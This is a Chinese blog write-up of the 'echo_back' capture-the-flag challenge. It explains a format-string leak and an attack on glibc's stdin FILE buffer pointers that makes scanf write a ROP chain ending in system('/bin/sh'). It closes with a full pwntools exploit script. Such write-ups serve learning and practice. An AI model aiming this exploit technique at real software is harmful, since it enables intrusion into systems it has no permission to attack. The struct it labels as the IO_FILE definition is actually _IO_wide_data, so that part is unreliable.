<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no">
<meta name="author" content="HeZhaochen">



<meta name="description" content="前言最近在攻防世界里刷到了echo_back这道题，本来以为这可能是一道格式化字符串的题，但是研究之后发现只能输入7个字符，所以传统的格式化字符串漏洞就无法进行利用。在看了其他大师傅的wp之后才知道了要对IO_FILE_stdin结构体指针进行攻击，所以学习之后在这里做一个记录。">
<meta name="keywords" content="pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="攻防世界-echo_back-IO_FILE结构体初探">
<meta property="og:url" content="http://yoursite.com/2020/05/29/攻防世界-echo-back-IO-FILE结构体初探/index.html">
<meta property="og:site_name" content="good good study,day day up!">
<meta property="og:description" content="前言最近在攻防世界里刷到了echo_back这道题，本来以为这可能是一道格式化字符串的题，但是研究之后发现只能输入7个字符，所以传统的格式化字符串漏洞就无法进行利用。在看了其他大师傅的wp之后才知道了要对IO_FILE_stdin结构体指针进行攻击，所以学习之后在这里做一个记录。">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://yoursite.com/img/echo_back/2.jpg">
<meta property="og:image" content="http://yoursite.com/img/echo_back/1.jpg">
<meta property="og:image" content="http://yoursite.com/img/echo_back/3.jpg">
<meta property="og:image" content="http://yoursite.com/img/echo_back/4.jpg">
<meta property="og:updated_time" content="2020-06-05T06:54:34.711Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="攻防世界-echo_back-IO_FILE结构体初探">
<meta name="twitter:description" content="前言最近在攻防世界里刷到了echo_back这道题，本来以为这可能是一道格式化字符串的题，但是研究之后发现只能输入7个字符，所以传统的格式化字符串漏洞就无法进行利用。在看了其他大师傅的wp之后才知道了要对IO_FILE_stdin结构体指针进行攻击，所以学习之后在这里做一个记录。">
<meta name="twitter:image" content="http://yoursite.com/img/echo_back/2.jpg">

<link rel="apple-touch-icon" href="/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="good good study,day day up!" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">


<link rel="stylesheet" href="/css/style.css">



<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>攻防世界-echo_back-IO_FILE结构体初探 | good good study,day day up!</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: false
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/avatar.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">HeZhaochen</a></h1>
        </hgroup>

        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/heap/">heap</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/how2heap/">how2heap</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn/">pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/密码学/">密码学</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" href="https://hexo.io">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://pages.github.com/">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://moxfive.xyz/">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">专注于前端</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">HeZhaochen</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/avatar.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">HeZhaochen</a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" target="_blank" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我"/>
</nav>
      <div class="body-wrap"><article id="post-攻防世界-echo-back-IO-FILE结构体初探" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2020/05/29/攻防世界-echo-back-IO-FILE结构体初探/" class="article-date">
      <time datetime="2020-05-29T10:40:40.000Z" itemprop="datePublished">2020-05-29</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      攻防世界-echo_back-IO_FILE结构体初探
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/">pwn</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>最近在攻防世界里刷到了echo_back这道题，本来以为这可能是一道格式化字符串的题，但是研究之后发现只能输入7个字符，所以传统的格式化<br>字符串漏洞就无法进行利用。在看了其他大师傅的wp之后才知道了要对IO_FILE_stdin结构体指针进行攻击，所以学习之后在这里做一个记录。</p>
<a id="more"></a>

<h2 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h2><p><img src="/img/echo_back/2.jpg" alt="avatar"><br>checksec发现这是一个64位保护全开的程序，就有点头痛。</p>
<p><img src="/img/echo_back/1.jpg" alt="avatar"></p>
<p><img src="/img/echo_back/3.jpg" alt="avatar"><br>ida反编译后发现程序的逻辑还是比较简单的，大致上只有两个功能，一个是输入name，一个就是格式化字符串所在的echo_back函数、</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>由于能够重复输入，我们首先就能够利用格式化字符串漏洞来泄露libc地址和程序基址，这里就不进行赘述了。经过我们的调试，我们可以使用<br><em>%19$p*来泄露出Libc_start_main+240的地址，然后就能够计算出我们所需要的libc地址了。同样的，我们可以利用</em>%13$p*来泄露程序基址，<br>但其实在这道题目中并不需要知道程序基址。</p>
<p>在泄露了libc地址之后，我们本能的就会想到利用格式化字符串漏洞修改返回地址为one_gadget来拿到shell。这里我们通过泄露rbp内容来获取<br>main_ret的地址。我们只需要输入<em>%12$p</em>就能够得到rbp地址，然后+8就是ret地址了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">#show libc_addr</span><br><span class="line">echo(&apos;%19$p&apos;)</span><br><span class="line">p.recvuntil(&apos;say:&apos;)</span><br><span class="line">libc_start_main = int(p.recv(14),16)-240</span><br><span class="line">libc_base = libc_start_main - libc.sym[&apos;__libc_start_main&apos;]</span><br><span class="line">system = libc_base + libc.sym[&apos;system&apos;]</span><br><span class="line">binsh = libc_base + libc.search(&apos;/bin/sh&apos;).next()</span><br><span class="line">pop_rdi = libc_base + 0x21102</span><br><span class="line">stdin = libc_base + libc.sym[&apos;_IO_2_1_stdin_&apos;]</span><br><span class="line">buf_base = stdin + 0x8*7</span><br><span class="line">#show main_addr</span><br><span class="line">echo(&apos;%13$p&apos;)</span><br><span class="line">p.recvuntil(&apos;say:&apos;)</span><br><span class="line">main_addr = int(p.recv(14),16)-0x9c</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># get addr store return addr of main</span><br><span class="line">echo(&apos;%12$p&apos;)</span><br><span class="line">p.recvuntil(&apos;say:&apos;)</span><br><span class="line">main_rbp = int(p.recv(14),16)</span><br><span class="line">main_ret = main_rbp+8</span><br></pre></td></tr></table></figure>

<p>但是由于题目限制了输入的长度，所以我们直接修改ret地址是做不到的。这里就需要利用到setname这个函数了。当我们输入了name后，发现<br>第16个参数就是我们输入的name，所以我们可以先setname(p64(main_ret)),然后利用格式化字符串修改返回地址。但是无论怎么构建payload<br>长度都是不够的，所以这里就要用到新的知识了，那就是直接攻击scanf函数内部，然后直接利用scanf函数往目标地址处写我们的数据。</p>
<p>经过了解我们知道scanf是通过stdin来读取数据的，那么如果我们能够修改stdin的数据，就能够实现任意地址的读写了。而实际上stdin是一个<br>IO_FILE结构体指针，所以我们先来了解一下FILE结构体指针吧。<br>下面是有关IO_FILE结构体定义的源码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">struct _IO_wide_data</span><br><span class="line">&#123;</span><br><span class="line">  wchar_t *_IO_read_ptr;	/* Current read pointer */</span><br><span class="line">  wchar_t *_IO_read_end;	/* End of get area. */</span><br><span class="line">  wchar_t *_IO_read_base;	/* Start of putback+get area. */</span><br><span class="line">  wchar_t *_IO_write_base;	/* Start of put area. */</span><br><span class="line">  wchar_t *_IO_write_ptr;	/* Current put pointer. */</span><br><span class="line">  wchar_t *_IO_write_end;	/* End of put area. */</span><br><span class="line">  wchar_t *_IO_buf_base;	/* Start of reserve area. */</span><br><span class="line">  wchar_t *_IO_buf_end;		/* End of reserve area. */</span><br><span class="line">  /* The following fields are used to support backing up and undo. */</span><br><span class="line">  wchar_t *_IO_save_base;	/* Pointer to start of non-current get area. */</span><br><span class="line">  wchar_t *_IO_backup_base;	/* Pointer to first valid character of</span><br><span class="line">				   backup area */</span><br><span class="line">  wchar_t *_IO_save_end;	/* Pointer to end of non-current get area. */</span><br><span class="line"></span><br><span class="line">  __mbstate_t _IO_state;</span><br><span class="line">  __mbstate_t _IO_last_state;</span><br><span class="line">  struct _IO_codecvt _codecvt;</span><br><span class="line"></span><br><span class="line">  wchar_t _shortbuf[1];</span><br><span class="line"></span><br><span class="line">  const struct _IO_jump_t *_wide_vtable;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>在知道了初步FILE结构体之后，我们就要看最重要的_IO_new_file_underflow函数了。这和函数再libio-&gt;fileops.c中。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">int _IO_new_file_underflow (_IO_FILE *fp)</span><br><span class="line">&#123;</span><br><span class="line">  _IO_ssize_t count;</span><br><span class="line">  ...</span><br><span class="line">  if (fp-&gt;_flags &amp; _IO_NO_READS)</span><br><span class="line">    &#123;</span><br><span class="line">      fp-&gt;_flags |= _IO_ERR_SEEN;</span><br><span class="line">      __set_errno (EBADF);</span><br><span class="line">      return EOF;</span><br><span class="line">    &#125;</span><br><span class="line">  ## 如果输入缓冲区里存在数据，则直接返回</span><br><span class="line">  if (fp-&gt;_IO_read_ptr &lt; fp-&gt;_IO_read_end)</span><br><span class="line">    return *(unsigned char *) fp-&gt;_IO_read_ptr;</span><br><span class="line">  ...</span><br><span class="line">  if (fp-&gt;_IO_buf_base == NULL)</span><br><span class="line">    &#123;</span><br><span class="line">      ...</span><br><span class="line">      _IO_doallocbuf (fp);</span><br><span class="line">    &#125;</span><br><span class="line">  ...</span><br><span class="line">  fp-&gt;_IO_read_base = fp-&gt;_IO_read_ptr = fp-&gt;_IO_buf_base;</span><br><span class="line">  fp-&gt;_IO_read_end = fp-&gt;_IO_buf_base;</span><br><span class="line">  fp-&gt;_IO_write_base = fp-&gt;_IO_write_ptr = fp-&gt;_IO_write_end</span><br><span class="line">    = fp-&gt;_IO_buf_base;</span><br><span class="line">  ##调用_IO_SYSREAD函数最终执行系统调用读取数据</span><br><span class="line">  count = _IO_SYSREAD (fp, fp-&gt;_IO_buf_base,</span><br><span class="line">               fp-&gt;_IO_buf_end - fp-&gt;_IO_buf_base);</span><br><span class="line">  ...</span><br><span class="line">  ## 设置结构体指针</span><br><span class="line">  fp-&gt;_IO_read_end += count;</span><br><span class="line">  ...</span><br><span class="line">  return *(unsigned char *) fp-&gt;_IO_read_ptr;</span><br><span class="line">&#125;</span><br><span class="line">libc_hidden_ver (_IO_new_file_underflow, _IO_file_underflow)</span><br></pre></td></tr></table></figure>

<p>在这个函数中，程序首先会进行一定的处理。然后会判断如果fp-&gt;_IO_read_ptr &lt; fp-&gt;_IO_read_end，那么直接返回_IO_read_ptr<br>否则，函数就会调用_IO_SYSREAD来读取数据，并且读取的长度是fp-&gt;_IO_buf_end - fp-&gt;_IO_buf_base。所以只要我们能够修改这两个<br>地址的值，我们就能够实现任意地址读写。</p>
<p>在学习了这些前置知识之后，我们就可以开始具体的程序利用了。<br>我们首先查看一下程序中stdin结构体的情况<br><img src="/img/echo_back/4.jpg" alt="avatar"><br>我们发现_IO_buf_base和_IO_buf_end是stdin中的第8,9个参数，所以_IO_2_1_stdin+7*8就是buf_base。<br>经过调试我们发现_IO_buf_base中存的值为0x7ffff7dd1963,而_IO_2_1_stdin_的地址为0x7ffff7dd18e0，从而计算出_IO_buf_base的地<br>址为0x7ffff7dd1918。那么当我们利用格式化字符串漏洞修改buf_base中的值的最后两位为\x00后，存的值正好就是IO_write_base的地址。<br>所以我们先读取0x18个字节之后，我们就能覆盖到_IO_buf_base和_IO_buf_end了。这里我们需要注意的就是记得把前面的值恢复原样，也就是<br>IO_2_1_stdin+0x83。之后在buf_base和buf_end分别写入main_ret和main_ret+0x18,我们就能写入ROP链了</p>
<p>但是在测试之后发现我们直接写入ROP链是不可行的，这是因为我们还需要绕过一个判断：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">if (fp-&gt;_IO_read_ptr &lt; fp-&gt;_IO_read_end)</span><br><span class="line">   return *(unsigned char *) fp-&gt;_IO_read_ptr;</span><br></pre></td></tr></table></figure>

<p>由于我们前面执行时，执行了<em>fp-&gt;_IO_read_end += count = len(payload)</em>，并且getchar的作用就是使_IO_read_end+1,所以还需要执<br>行len(payload)-1次getchar，我们才能够进行正常的ROP</p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line">#coding:utf-8</span><br><span class="line">from pwn import *</span><br><span class="line">context.log_level = &apos;debug&apos;</span><br><span class="line">p = process(&apos;./pwn&apos;)</span><br><span class="line">e = ELF(&apos;./pwn&apos;)</span><br><span class="line">libc = ELF(&apos;libc.so.6&apos;)</span><br><span class="line">def setname(name):</span><br><span class="line">	p.sendlineafter(&apos;&gt;&gt; &apos;,&apos;1&apos;)</span><br><span class="line">	p.sendlineafter(&apos;name:&apos;,name)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def echo(payload):</span><br><span class="line">	p.sendlineafter(&apos;&gt;&gt; &apos;,&apos;2&apos;)</span><br><span class="line">	p.sendlineafter(&apos;:&apos;,&apos;7&apos;)</span><br><span class="line">	p.sendline(payload)</span><br><span class="line"></span><br><span class="line">#show libc_addr</span><br><span class="line">echo(&apos;%19$p&apos;)</span><br><span class="line">p.recvuntil(&apos;say:&apos;)</span><br><span class="line">libc_start_main = int(p.recv(14),16)-240</span><br><span class="line">libc_base = libc_start_main - libc.sym[&apos;__libc_start_main&apos;]</span><br><span class="line">system = libc_base + libc.sym[&apos;system&apos;]</span><br><span class="line">binsh = libc_base + libc.search(&apos;/bin/sh&apos;).next()</span><br><span class="line">pop_rdi = libc_base + 0x21102</span><br><span class="line">stdin = libc_base + libc.sym[&apos;_IO_2_1_stdin_&apos;]</span><br><span class="line">buf_base = stdin + 0x8*7</span><br><span class="line">#show main_addr</span><br><span class="line">echo(&apos;%13$p&apos;)</span><br><span class="line">p.recvuntil(&apos;say:&apos;)</span><br><span class="line">main_addr = int(p.recv(14),16)-0x9c</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># get addr store return addr of main</span><br><span class="line">echo(&apos;%12$p&apos;)</span><br><span class="line">p.recvuntil(&apos;say:&apos;)</span><br><span class="line">main_rbp = int(p.recv(14),16)</span><br><span class="line">main_ret = main_rbp+8</span><br><span class="line"></span><br><span class="line">setname(p64(buf_base))</span><br><span class="line">echo(&apos;%16$hhn&apos;)</span><br><span class="line">payload = p64(0x83 + stdin)*3 + p64(main_ret) + p64(main_ret + 0x8 * 3)  </span><br><span class="line">p.sendlineafter(&apos;choice&gt;&gt;&apos;,&apos;2&apos;)  </span><br><span class="line">p.sendafter(&apos;length:&apos;,payload)  </span><br><span class="line">p.sendline(&apos;&apos;)  </span><br><span class="line">	#不断调用getchar()使fp-&gt;_IO_read_ptr与使fp-&gt;_IO_read_end相等  </span><br><span class="line">for i in range(0,len(payload)-1):  </span><br><span class="line">	p.sendlineafter(&apos;choice&gt;&gt;&apos;,&apos;2&apos;)  </span><br><span class="line">	p.sendlineafter(&apos;length:&apos;,&apos;&apos;)  </span><br><span class="line"></span><br><span class="line">p.sendlineafter(&apos;&gt;&gt; &apos;,&apos;2&apos;)</span><br><span class="line">payload = p64(pop_rdi)+p64(binsh)+p64(system)</span><br><span class="line">p.sendlineafter(&apos;:&apos;,payload)</span><br><span class="line">p.sendline(&apos;&apos;)</span><br><span class="line">p.sendlineafter(&apos;&gt;&gt; &apos;,&apos;3&apos;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>


      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2020/05/29/攻防世界-echo-back-IO-FILE结构体初探/">攻防世界-echo_back-IO_FILE结构体初探</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">HeZhaochen</a></p>
        <p><span>发布时间:</span>2020-05-29, 18:40:40</p>
        <p><span>最后更新:</span>2020-06-05, 14:54:34</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2020/05/29/攻防世界-echo-back-IO-FILE结构体初探/" title="攻防世界-echo_back-IO_FILE结构体初探">http://yoursite.com/2020/05/29/攻防世界-echo-back-IO-FILE结构体初探/</a>
            <span class="copy-path" data-clipboard-text="原文: http://yoursite.com/2020/05/29/攻防世界-echo-back-IO-FILE结构体初探/　　作者: HeZhaochen" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2020/03/20/0ctf-2017-babyheap/">
                    0ctf-2017-babyheap
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#程序分析"><span class="toc-number">2.</span> <span class="toc-text">程序分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞利用"><span class="toc-number">3.</span> <span class="toc-text">漏洞利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exp"><span class="toc-number">4.</span> <span class="toc-text">exp</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"攻防世界-echo_back-IO_FILE结构体初探　| good good study,day day up!　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    




    <div class="scroll" id="post-nav-button">
        
            <a href="/" title="回到主页"><i class="fa fa-home"></i></a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2020/03/20/0ctf-2017-babyheap/" title="下一篇: 0ctf-2017-babyheap">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/05/29/攻防世界-echo-back-IO-FILE结构体初探/">攻防世界-echo_back-IO_FILE结构体初探</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/20/0ctf-2017-babyheap/">0ctf-2017-babyheap</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/15/高校抗疫-easyheap/">高校抗疫-easyheap</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/26/攻防世界-Noleak/">攻防世界-Noleak</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/22/攻防世界-Recho-读取flag文件/">攻防世界-Recho-读取flag文件</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/17/ReeHY-mian-100-Unlink/">ReeHY-mian-100-Unlink</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/08/栈溢出的总结/">栈溢出的总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/05/2014-HITCON-CTF-stkof/">2014 HITCON CTF-stkof</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/01/23/攻防世界PWN之note-service2/">攻防世界PWN之note-service2</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/12/02/how2heap学习笔记-1-——fastbin-dup/">hoe2heap学习笔记(1)——fastbin_dup</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/11/20/XCTF-format2-整数溢出/">XCTF-format2-整数溢出</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/11/18/mma-ctf-2nd-2016-greeting-150/">mma-ctf-2nd-2016-greeting-150</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/22/MCTF校赛WP-2/">MCTF校赛WP(2)</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/17/MCTF初赛WP-1/">MCTF初赛WP(1)</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/10/初次学习RSA密码/">初次学习RSA密码</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/31/use-after-free的学习/">use after free的学习</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/27/使用LibcSearcher解题/">使用LibcSearcher解题</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/21/heap-1/">heap-1</a></li></ul>




    <script>
        
    </script>
</div>
